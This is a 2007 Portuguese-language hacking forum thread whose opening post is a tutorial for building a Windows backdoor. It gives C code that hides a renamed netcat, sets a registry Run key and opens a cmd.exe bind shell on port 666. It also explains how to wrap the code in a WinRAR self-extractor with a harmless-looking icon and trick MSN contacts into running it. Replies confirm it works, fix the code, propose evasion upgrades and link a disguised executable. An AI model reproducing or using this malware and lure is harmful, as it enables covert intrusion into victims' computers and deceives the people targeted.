Root shell em segundos.

Started by mrx, 21 de January , 2007, 04:58:32 AM

Previous topic - Next topic

0 Members and 1 Guest are viewing this topic.

Print
Go Down Pages1
User actions

mrx

21 de January , 2007, 04:58:32 AM
Programas necessários.

(1-) Winrar.
 
 Uso: Este irá agir como um joiner que executará a backdoor assim que clicada.
 Fonte: http://www.superdownloads.com.br

(2-) Netcat.

 Uso: Essa será a nossa backdoor em si.
 Fonte: http://www.elhacker.net (Baixe a versão para NT 1.1).

(3-) Programa customizado em C.
 
 Uso: Ele executará todos os comandos necessários no sistema da vítima.
 Fonte: Nós que iremos criar, será necessário o compilador para Windows blood shed dev C++ (fonte: http://www.bloodshed.net).

(4-) Engenharia social.
 
 Uso: Precisaremos enganar a vítima para que ela execute a backdoor.
 Fonte: Sua mente!

Iniciando a criação da backdoor.

Bom, primeiramente faça uma cópia do netcat(nc.exe) e renomeie-o para algo mais inofensivo, no nosso caso ele foi renomeado para

AutoUpdater.exe. Agora vamos iniciar a criação do nosso programa customizado em C. Abra o bloco de notas e insira nele o seguinte código em

C:


#include
#include

int main(void) {

system("@echo off");
system("@break off");
system("@Copy AutoUpdater.exe C:\\Windows\\repair");
system("@del AutoUpdater.exe");
system("@cd C:\\Windows\\repair");
system("@attrib +h AutoUpdater.exe");
system("@Reg Add HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v WinUpdate /t REG_SZ /d \"Start

C:\\Windows\\repair\\AutoUpdater.exe -d -L -t -p666 -e cmd.exe\");
system("Start C:\\Windows\\repair\\AutoUpdater.exe -d -L -t -p666 -e cmd.exe");

return 0;

}

Salve esse arquivo com o nome de h4x0r.c. Abra h4x0r.c com o blood shed e vá em Executar > Compilar(Execute > Compile). Um executável

chamado h4x0r.exe será gerado. A simplicidade do código gera um arquivo pequeno(cerca de 3kb), isso faz ele executar o necessário para se

invadir a vítima e evita que ele seja detectado pelo av.


Essa será a nossa chave para a invasão, agora vamos fazer a última e mais importante parte de nossa backdoor.

Usando o winrar como joiner

Tendo os arquivos h4x0r.exe e AutoUpdater.exe(o netcat na verdade) preparados, abra o winrar e siga as instruções abaixo:

(1-) Vá em Comandos > Adicionar arquivos para a compreensão.
(2-) Marque a opção "Criar arquivo sfx" e de um nome para o arquivo que será gerado na barra com a extensão .exe
(3-) Feito isso, vá na aba arquivos, use o botão anexar para importar os arquivos AutoUpdater.exe e h4x0r.exe
(4-) Vá na guia avançado e acesse "Opções de sfx". No caminho a ser extraido os arquivos deixe C:\
(5-) Marque a opção "salvar e restaurar arquivo". Na barra "Executar após a extração", digite h4x0r.exe
(6-) Vá para a  guia Métodos e marque "Ocultar tudo" e "Substituir todos os arquivos".
(7-) Vá na guia Texto e ícone e em "Carregar ícone sfx do arquivo", carregue um ícone inocente para nao levantar suspeitas. Uma dica é usar

o ABB icon explorer que extrai todos os ícones da dll shell32.dll do sistema em formato .ico(fonte:

http://http://www.topshareware.com/ABB- ... -46739.htm)

(8-) Clique em ok e depois em ok novamente. O arquivo será gerado com o nome e ícone que você escolheu. Compacte-o agora normalmente em um

arquivo .rar




Sua backdoor está pronta. Espere sua vítima entrar no msn, abra o ms-dos e digite o seguinte comando:

netstat -n


Fale com ela e começe a enganá-la. Passe o arquivo para ela dando uma boa desculpa, falando que é um programa de segurança, um joguinho, ou

qualquer outra desculpa que lhe venha a calhar. A engenharia social é com você, use o que lhe achar mais conveniente. No meu caso disse que se tratava de um jogo, meu computador tinha sido danificado por vírus e disse que o jogo não estava rodando e pedi para a vítima executar pra mim para saber se o problema era o meu computador ou era o jogo que tava bichado. Funciono, ownei quase que simultaneamente oito computadores assim hehe. Quando a vítima

aceitar o arquivo, durante a transferência digite o seguinte comando:

netstat -n

o ip que não apareceu na saída do comando anterior é o da vítima. Espere ela executar e pergunte se o arquivo executou corretamente.

Normalmente ele vai falar "Não, só pisco uma telinha preta aqui". Nessa hora digite no seu prompt:

telnet 666

exemplo:

telnet 201.143.22.181 666

Em menos de dois segundos você ganha uma shell administrativa no sistema! Vamos entender o que o programa h4x0r que criamos fez sem a

vitima ver:

(1-)copiou o netcat renomeado de C:\ para C:\Windows\repair.
(2-)excluiu o netcat renomeado de C:\
(3-)acessou C:\Windows\repair e deixou o netcat renomeado com atributo oculto.
(4-)Adicionou uma chave no registro para que o netcat inicie sempre com o windows deixando uma shell aceitando conexões na porta tcp 666.
 Assim sempre que ela conectar no msn basta pegar o ip de novo mandando um arquivo ou uma mensagem de voz para pegar mais rápido.
(5-)Assim que foi executada, a backdoor já deixou uma shell remota escutando na porta tcp 666.

Pronto, owned! O sistema é seu, faça o que quiser.



Obs: Caso queira verificar a porta aberta com um portscan use o netcat para isso. Com o nmap(tanto no windows quanto no linux), provoca um

bug que se envia um pacote syn a porta, é retomada que ela está aberta, mas no final do scan ela fecha sozinha! Portanto nada de nmap.

Tutorial By: K00D13.


Voltando a ativa. ;P

eb0x

#1
01 de March , 2007, 04:23:24 AM
Ainda nao testei, mas parece que funciona pelo menos aqui.
Vamos ver na pratica. Ja tinha visto isso antes em algum lugar nao me lembro aonde, mas manou bem.
Ponto positivo

format pro C

java_aly

#2
18 de April , 2007, 11:35:51 PM
Legal!!

Sei que funciona, apesar de ser um técnica meio antiga!
Mas ta de parebens por passar o conhecimento!!!! ;D
"_  O vírus da cura ou a cura do vírus, isso depende... _"

bironet

#3
19 de April , 2007, 10:12:08 AM
Quote from: "mrx"Programas necessários.


AutoUpdater.exe. Agora vamos iniciar a criação do nosso programa customizado em C. Abra o bloco de notas e insira nele o seguinte código em

C:


#include
#include

int main(void) {

system("@echo off");
system("@break off");
system("@Copy AutoUpdater.exe C:\\Windows\\repair");
system("@del AutoUpdater.exe");
system("@cd C:\\Windows\\repair");
system("@attrib +h AutoUpdater.exe");
system("@Reg Add HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v WinUpdate /t REG_SZ /d "Start

C:\\Windows\\repair\\AutoUpdater.exe -d -L -t -p666 -e cmd.exe");
system("Start C:\\Windows\\repair\\AutoUpdater.exe -d -L -t -p666 -e cmd.exe");

return 0;

}

Salve esse arquivo com o nome de h4x0r.c. Abra h4x0r.c com o blood shed e vá em Executar > Compilar(Execute > Compile). Um executável

chamado h4x0r.exe será gerado. A simplicidade do código gera um arquivo pequeno(cerca de 3kb), isso faz ele executar o necessário para se

invadir a vítima e evita que ele seja detectado pelo av.

Nice... ! Testado e completamente funcional. Não programo nada em C mas acho que o unico erro é o que da de vermelho ai
na sorce, se não ficar assim :

#include
#include

int main(void) {

system("@echo off");
system("@break off");
system("@Copy AutoUpdater.exe C:\\Windows\\repair");
system("@del AutoUpdater.exe");
system("@cd C:\\Windows\\repair");
system("@attrib +h AutoUpdater.exe");
system("@Reg Add HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v WinUpdate /t REG_SZ /d "Start");
system("Start C:\\Windows\\repair\\AutoUpdater.exe -d -L -t -p666 -e cmd.exe");

return 0;

}


Não compila. Fora isso SHOW ...
Parabéns.

HadeS

#4
20 de April , 2007, 07:32:23 AM
Sim bironet, era só o espaço que tinha ali.

E não seria mais fácil fazer em batch que em C?!? Oo

HadeS

bironet

#5
20 de April , 2007, 08:00:56 AM
Ihhh pra mim da no mesmo, aprendendo linguagem agora, bastante delphi e asp fora isso um slqzinho .
Mas que funcionou funcionou :) o bom de ta em C é que agente poderia implementar mais algumas coisas
ou mesmo em VB, tipo aviso de quando o user infect conectou a internet, um algoritmo de polimorfia
sei lá... algo assim, muito user leigo aceita essas coisas por msn.

HadeS

#6
20 de April , 2007, 08:21:14 AM
Eu disse isso porque o programa só roda comandos do sistema.

HadeS

bironet

#7
20 de April , 2007, 08:39:22 AM
Sakei... mas se for implementar como disse, em Batch fica complicado . :D

Quando tiver um tempinho vou da uma mudada nisso ai rs " mesmo sem saber C " .

Vlw.

JotaC

#8
19 de May , 2007, 03:54:33 PM
Básico, mas legal, depois para quem gosta mais de mexer com grafico em vez de texto eh soh activar o "Ligação de ambiente trabalho remoto", não sei de cor como se faz isso por telnet mas mais tarde faço um tutorial =)
      .]

rog

#9
19 de May , 2007, 05:37:01 PM
talvez algo como

net start nome_do_serviço

de qualquer forma a ligaçao em remote desktop tem que dar um log off no na sessao aberta para poder connectar

rog
realty.sys is corrupt :  reboot the universe (Y/N)

1NT3RC3PT0R

#10
23 de May , 2007, 09:49:48 PM
Muito interesante isto, mas eu gostaria de saber se é possivel colocar um usuario com senha, para não deixar aberto a qualquer pessoa. Será que tem como?

Anonymous

#11
25 de May , 2007, 08:02:05 PM
ae cara, tem algum outro link pro nc? esse daew do el hacker n conecta...

flws

Anonymous

#12
25 de May , 2007, 08:55:23 PM
ae gente, fiz o programa em bat, mudei algumas coisas mas tah tudo igual, a porta eh a 666 (a mesma).
eu soh nao consegui arruma o icone =S
o nome do exe tah como DuckBlitz_Install.exe.

Link: http://rapidshare.com/files/33408831/Du ... l.exe.html

HadeS

#13
26 de May , 2007, 04:47:44 PM
Posta o fonte aqui.

HadeS
Print
Go Up Pages1
User actions